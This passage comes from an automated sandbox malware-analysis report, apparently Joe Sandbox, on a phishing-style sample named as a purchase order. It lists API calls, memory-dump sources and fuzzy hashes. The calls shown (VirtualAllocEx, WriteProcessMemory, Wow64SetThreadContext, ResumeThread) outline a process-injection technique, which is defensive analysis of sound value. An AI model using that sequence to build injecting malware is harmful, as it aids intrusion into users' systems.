                                                              control_flow_graph 249 66d40da-66d40dc 250 66d40de-66d414f ResumeThread 249->250 251 66d4082-66d40af 249->251 259 66d4158-66d417d 250->259 260 66d4151-66d4157 250->260 254 66d40b6-66d40ca 251->254 255 66d40b1 251->255 255->254 260->259
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: ac113dc8a68c4273f6dd488abc1e113c13f1ab5b0656a48c8eb5b6a581beeb31
                                                              • Instruction ID: 5150fb8c7e35965d55bc6b6e808bacf12ecd6f3740eddfff87f16db39a865303
                                                              • Opcode Fuzzy Hash: ac113dc8a68c4273f6dd488abc1e113c13f1ab5b0656a48c8eb5b6a581beeb31
                                                              • Instruction Fuzzy Hash: 24217671D002089BDB10DFAAD8457EEBBF9EF88314F14846AD519A7350DB786A40CBE1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 264 66d4758-66d47ae 267 66d47be-66d47fd WriteProcessMemory 264->267 268 66d47b0-66d47bc 264->268 270 66d47ff-66d4805 267->270 271 66d4806-66d4836 267->271 268->267 270->271
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D47F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 7dd38b058de5a23046ed3aeb5b454c57538f468308839f1460e50754edfbafb1
                                                              • Instruction ID: 511f42fbb554034cccdda9425ee6c1b4ef11d6b29ff056d58b6cd608efa85c86
                                                              • Opcode Fuzzy Hash: 7dd38b058de5a23046ed3aeb5b454c57538f468308839f1460e50754edfbafb1
                                                              • Instruction Fuzzy Hash: 962126759103599FDB10CFA9C881BDEBBF5BF48210F14842AE959A7340C7799940CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 275 66d4760-66d47ae 277 66d47be-66d47fd WriteProcessMemory 275->277 278 66d47b0-66d47bc 275->278 280 66d47ff-66d4805 277->280 281 66d4806-66d4836 277->281 278->277 280->281
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066D47F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 47d3d2d7f81f03752aced911c436ff8f43bf97bc1168eee584e8140d75d6170c
                                                              • Instruction ID: 9e6fa6fb1d49bf44d8070359a5fcbc912ce5c3198d573f71c3788420cb68d885
                                                              • Opcode Fuzzy Hash: 47d3d2d7f81f03752aced911c436ff8f43bf97bc1168eee584e8140d75d6170c
                                                              • Instruction Fuzzy Hash: 9D211576D003599FDB10CFAAC885BDEBBF5FF48310F14842AE959A7240C779A954CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 285 66d4848-66d48dd ReadProcessMemory 288 66d48df-66d48e5 285->288 289 66d48e6-66d4916 285->289 288->289
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D48D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 8732204df1f56c2b2f80f126684ce10a79778e083a59df8d88cbe13e8043a693
                                                              • Instruction ID: 786c8880117ea39b59005831f634bbff0b2fa0ce614c3b968d888ee00eaa81b8
                                                              • Opcode Fuzzy Hash: 8732204df1f56c2b2f80f126684ce10a79778e083a59df8d88cbe13e8043a693
                                                              • Instruction Fuzzy Hash: 6D212572D002499FDB10CFA9C880BEEBBF1BF48310F14842AE559A7250C7799A50CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 293 66d418a-66d41db 295 66d41dd-66d41e9 293->295 296 66d41eb-66d421b Wow64SetThreadContext 293->296 295->296 298 66d421d-66d4223 296->298 299 66d4224-66d4254 296->299 298->299
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D420E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: b8bdcd2796cb98df7ffc05c236aca8b4bac4b9d06e764447312538ad4912e028
                                                              • Instruction ID: 267ae401ced19ddf8f541209b637425a7af553c7a872da8270609be86e7d1dee
                                                              • Opcode Fuzzy Hash: b8bdcd2796cb98df7ffc05c236aca8b4bac4b9d06e764447312538ad4912e028
                                                              • Instruction Fuzzy Hash: F4213472D103098FDB10CFAAC8857EEBBF5AF88214F14842ED459A7240CB789A45CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 303 b8d689-b8d724 DuplicateHandle 304 b8d72d-b8d74a 303->304 305 b8d726-b8d72c 303->305 305->304
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8D717
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a7076a6b2f2cdfdcf5fcdb8f0681afffff9148f67ed4c9a676f696e8ccda06c7
                                                              • Instruction ID: e03ab32cbf030d9081b2b10d229a76e5c2a688c0c4dba4b20b2bb5093f52b581
                                                              • Opcode Fuzzy Hash: a7076a6b2f2cdfdcf5fcdb8f0681afffff9148f67ed4c9a676f696e8ccda06c7
                                                              • Instruction Fuzzy Hash: 3B21E4B5900249DFDB10CFAAD484AEEBBF5FB48320F14806AE958A3350C374A955CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 318 66d4850-66d48dd ReadProcessMemory 321 66d48df-66d48e5 318->321 322 66d48e6-66d4916 318->322 321->322
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D48D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 9fcfe363f8c878d4a33386e934b9d4f10961ea5264aa533affc5bb29a7e7f26b
                                                              • Instruction ID: 547bd6b9aa98494439fee285f62a72e1ee34fa4d6825b9dc0198f470aee546a3
                                                              • Opcode Fuzzy Hash: 9fcfe363f8c878d4a33386e934b9d4f10961ea5264aa533affc5bb29a7e7f26b
                                                              • Instruction Fuzzy Hash: E32114B2C003499FDB10CFAAC881BEEBBF5FF48310F54842AE559A7240C7799950CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 308 66d4190-66d41db 310 66d41dd-66d41e9 308->310 311 66d41eb-66d421b Wow64SetThreadContext 308->311 310->311 313 66d421d-66d4223 311->313 314 66d4224-66d4254 311->314 313->314
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D420E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 2c303c0b6cbbb4bec45cb3e202ea661d96cc473f704c2febfc04c407a39ebf57
                                                              • Instruction ID: 8baf247750a94cbe58c7f69926461fe4d4644c131396e138f1b088802f793f64
                                                              • Opcode Fuzzy Hash: 2c303c0b6cbbb4bec45cb3e202ea661d96cc473f704c2febfc04c407a39ebf57
                                                              • Instruction Fuzzy Hash: B2211875D103098FDB10DFAAC4857EEBBF4EF48214F14842AD559A7240DB789945CFA1
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8D717
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: aebfc12c5a357408873bb24e2c5f3b2c4541b76da34f4a78203efe1f441a135d
                                                              • Instruction ID: c6bf78e5e8f96f91f88416e46791acc94f1af0674294b3c4d1f1a11b5d407f1e
                                                              • Opcode Fuzzy Hash: aebfc12c5a357408873bb24e2c5f3b2c4541b76da34f4a78203efe1f441a135d
                                                              • Instruction Fuzzy Hash: 8C21D5B5900249DFDB10CF9AD584ADEFBF4FB48310F14845AE914A3350D374A954CFA5
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D470E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: f32d0f2c417d8f2165e2a72f11b5dd4ae3ff28234505445fe6d6e3c1c9285621
                                                              • Instruction ID: 15d8abd9558c1ee76229ea5261166977bcd451641560e74515e5e752421b896c
                                                              • Opcode Fuzzy Hash: f32d0f2c417d8f2165e2a72f11b5dd4ae3ff28234505445fe6d6e3c1c9285621
                                                              • Instruction Fuzzy Hash: FA1189728002499FDB10CFA9C844BDEBBF5EF48320F148419E519A7250CB759900CBA0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D470E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 571e0cd0a006c7dc01502aa6ca74ed00bcad32905f3fce7949d26c2889bc720e
                                                              • Instruction ID: 991ac5e5b91bc450a19d96a622f138521b5cee45962335fde800a7e896235c5c
                                                              • Opcode Fuzzy Hash: 571e0cd0a006c7dc01502aa6ca74ed00bcad32905f3fce7949d26c2889bc720e
                                                              • Instruction Fuzzy Hash: E71167729003499FDB10CFAAC844BDFBBF5EF48320F14841AE519A7250CB75A940CFA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 875e65c0dadd67128a513d0256ec6277dfe93f90a69859fe780d764acb7499a9
                                                              • Instruction ID: 83e412510242d71cd832e7ca55d2c02ab9c148cf9fb3f6432f4dbc5a071b84af
                                                              • Opcode Fuzzy Hash: 875e65c0dadd67128a513d0256ec6277dfe93f90a69859fe780d764acb7499a9
                                                              • Instruction Fuzzy Hash: 2B113A71D003498FDB10DFAAC8457EEFBF4EF88224F14841AD559A7340CB79A944CB94
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8AFFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 994ab73731d9a37d98446a538ca730fa39032e23c99d7f2442ad52480ff1e45c
                                                              • Instruction ID: 4d459f76753459b5589e926a767ed6d0b27d46bfe59c170a14dbcb00bb68fd2c
                                                              • Opcode Fuzzy Hash: 994ab73731d9a37d98446a538ca730fa39032e23c99d7f2442ad52480ff1e45c
                                                              • Instruction Fuzzy Hash: 201110B6C002498FDB10DF9AC444BDEFBF4EF88324F10846AD429A7220D379A545CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D7805
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: d022da9c4ee42cec2f9eac0e72fcad209cfc72a03ca61e3b77a140be041eb9cb
                                                              • Instruction ID: f5b0ebb2b57be4ebe6c1f8b442389de671048dea8cfba79645d41ea5bd603035
                                                              • Opcode Fuzzy Hash: d022da9c4ee42cec2f9eac0e72fcad209cfc72a03ca61e3b77a140be041eb9cb
                                                              • Instruction Fuzzy Hash: 88F0E2B68003099FDB50CF89D884BDEBBF4EB48324F10885AE558A7250C379A584CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bf79f192a563b1719bea79e7029cc1e1a6d8df7ec510df8d81a35d5907036c2
                                                              • Instruction ID: 2001133aa88204d86de63e7b5f05e26029cb817626f86abdf6a905bd48677c0d
                                                              • Opcode Fuzzy Hash: 8bf79f192a563b1719bea79e7029cc1e1a6d8df7ec510df8d81a35d5907036c2
                                                              • Instruction Fuzzy Hash: C421D372504344DFDB05DF50D9C4BAABB75FB88314F24C5AAE90A0B346C336D816CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5806726600def8db2a6d19cdfca3159443362eda839970bd683fbd24d6617eb7
                                                              • Instruction ID: 2cc6bf697e5a84160d8c981471285738182541d5c0bdc223891956ba813fc5b6
                                                              • Opcode Fuzzy Hash: 5806726600def8db2a6d19cdfca3159443362eda839970bd683fbd24d6617eb7
                                                              • Instruction Fuzzy Hash: 4121F5B1544244EFDB15DF14E9C0F26BF65FB88318F24C56AE80A0B356C336D856CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349625631.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_aed000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f899008c2766aaaab9f478bcc6df032523a8bd11fa7cb59ed545db98f831e0fb
                                                              • Instruction ID: 496b15416d3f3a57842278911d96fe178e6803463e4cde75556c123fbdb3f761
                                                              • Opcode Fuzzy Hash: f899008c2766aaaab9f478bcc6df032523a8bd11fa7cb59ed545db98f831e0fb
                                                              • Instruction Fuzzy Hash: 8021F271604384DFDB14DF10D9C0B26BB65FB84314F28C569D80A4B286C336D847CA62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349625631.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_aed000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9ba7de488ca594a4bec5d203cabeae7ecacc213daf2f4748696b0ade6071ccb
                                                              • Instruction ID: 973d54091efe079205f09c9013ef12ec44a732b1e973ac60f8f95bb1c092e293
                                                              • Opcode Fuzzy Hash: d9ba7de488ca594a4bec5d203cabeae7ecacc213daf2f4748696b0ade6071ccb
                                                              • Instruction Fuzzy Hash: E8215E755093C08FCB12CF24D994715BF71EB46314F28C5EAD8498B6A7C33A984ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
                                                              • Instruction ID: 226ea1e803bae2258686b197b9bf06e8aa6dd2530874d7674aed87b5ffdee3bb
                                                              • Opcode Fuzzy Hash: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
                                                              • Instruction Fuzzy Hash: AF21AF76504240DFCB06CF50D9C4B96BF72FB84314F24C5AADC090B656C33AD866CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                              • Instruction ID: a4f82c59a1ed901e1f6211b88da798d8e93bfdb68271e3713561884cfa7755c1
                                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                              • Instruction Fuzzy Hash: 2F11D376504280DFCB15CF10D5C4B56BF71FB94318F24C6AAD84A0B756C336D856CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d2e16880d940eef79bd059e4f2ba42ed36687a57e4c07d4fa6f6f810306321
                                                              • Instruction ID: 6ce4825aeaf1525fd231667d9338810c9dc9e6a92829bd6b6c7e0578ee812802
                                                              • Opcode Fuzzy Hash: 09d2e16880d940eef79bd059e4f2ba42ed36687a57e4c07d4fa6f6f810306321
                                                              • Instruction Fuzzy Hash: E201A2325043449FE7108B25CD84B66BBE8EF41325F28C4ABED0A5A382D6799840CAB2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22ebc15b75ef991b0a0b96d93b8f896582a799a9a58c5a9eac3bb61f5bfa2cd1
                                                              • Instruction ID: 74822d2201ddcaaf9579361689fc1d58b61310bfa3cbfcd156ed49145398f482
                                                              • Opcode Fuzzy Hash: 22ebc15b75ef991b0a0b96d93b8f896582a799a9a58c5a9eac3bb61f5bfa2cd1
                                                              • Instruction Fuzzy Hash: 48F06D72404344AFEB108B16DD84B66FBECEB91735F18C59BED095E282C279AC44CAB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 795c55bda4f5551e6e5a023602a6b17bf34005ecac8ce167917e1b743dcb29d8
                                                              • Instruction ID: a278a3a376bceb0272d73a5d36eb94347d41930593a42885a94548a957ed00e3
                                                              • Opcode Fuzzy Hash: 795c55bda4f5551e6e5a023602a6b17bf34005ecac8ce167917e1b743dcb29d8
                                                              • Instruction Fuzzy Hash: C5E12674E002598FDB14DFA8C580AAEFBF2FF89301F248169D518AB355D731A942CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac9a810087b263b1408e7d9bf35213e7e98d19108b366b5452d44b263d7fb044
                                                              • Instruction ID: 6f02688cfbf84be3d8eeb35d091c168d1bf84adc33040bb73b02731863968e5d
                                                              • Opcode Fuzzy Hash: ac9a810087b263b1408e7d9bf35213e7e98d19108b366b5452d44b263d7fb044
                                                              • Instruction Fuzzy Hash: 32E1E574E002598FDB14DFA9C580AAEFBF2FB89305F248169D415AB355DB30AD46CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 996b59013d7154556e172be40221c4c89f1e13e0a95c05b59b445d3b2a9ddef0
                                                              • Instruction ID: 0fbabf859f73a05712723cad77feb29a2eedb5fb1c09ab225eb4e0d712260e32
                                                              • Opcode Fuzzy Hash: 996b59013d7154556e172be40221c4c89f1e13e0a95c05b59b445d3b2a9ddef0
                                                              • Instruction Fuzzy Hash: C9E13874E002598FDB14DFA9C590AAEFBB2FF89304F248169D919AB355D730AD42CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8cb02df9a07b23ee51c5a80d97bbe2cb6c094f2ad8cc1a66dbfdb2f465e61a6
                                                              • Instruction ID: b635cb03223fa87752f176335cf4c913063b2a7b417aa590ec1d631400e5d011
                                                              • Opcode Fuzzy Hash: d8cb02df9a07b23ee51c5a80d97bbe2cb6c094f2ad8cc1a66dbfdb2f465e61a6
                                                              • Instruction Fuzzy Hash: 57E12774E002198FDB14DFA9C580AAEFBB2FF89300F248169D419AB355D731AD46CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9f4a1a27038b64020579555196f4244cf626dcaed3f7721a1cab569852b6b9c
                                                              • Instruction ID: c3dfbd5bd13db08c4ec4fed2444d261fb8c9f4d7b948a0dd1ad0a81a9d3bac5b
                                                              • Opcode Fuzzy Hash: d9f4a1a27038b64020579555196f4244cf626dcaed3f7721a1cab569852b6b9c
                                                              • Instruction Fuzzy Hash: 98A13A36E00206CFCF05EFA5D8845AEB7F2FF89304B2545BAE905AB265DB31E955CB40
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ae4b3fa7baf1aed9813e804d821ea74786c97d1e5c9da5ecefa1a16214930e1
                                                              • Instruction ID: beb01d0dc9821328e1429ffc131a8964cb65fea321f045c85c5eee4a68841372
                                                              • Opcode Fuzzy Hash: 6ae4b3fa7baf1aed9813e804d821ea74786c97d1e5c9da5ecefa1a16214930e1
                                                              • Instruction Fuzzy Hash: 51A26D70A00209CFDB15CFA8C988ABEBBF6FF89304F15856AE405AB265D735ED41CB51
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2cb07bd206238ad201a725420bf686c5cf30adf958ea0d31e76948ed6612fa1f
                                                              • Instruction ID: 5dcca53cc2465243fa98a0a314befe79f0fafd04ef8e3385623d19c79bfbe76d
                                                              • Opcode Fuzzy Hash: 2cb07bd206238ad201a725420bf686c5cf30adf958ea0d31e76948ed6612fa1f
                                                              • Instruction Fuzzy Hash: D9125E70A002199FDB14DFA9C958BAEBBFAFF88304F108569E405EB355DB349D42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd3fa367f89be8849b9a39087bec74b5328078282f1e1aa6fed8e6aa0058079e
                                                              • Instruction ID: 5efd56717851cf9cfc780afb261d7672e4d143ddefcfeed536d958f2d4c0f23d
                                                              • Opcode Fuzzy Hash: cd3fa367f89be8849b9a39087bec74b5328078282f1e1aa6fed8e6aa0058079e
                                                              • Instruction Fuzzy Hash: 8F123970A00209DFCB15CFA9D988AADFBF6FF88308F158466E815AB265D734DD41CB51
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
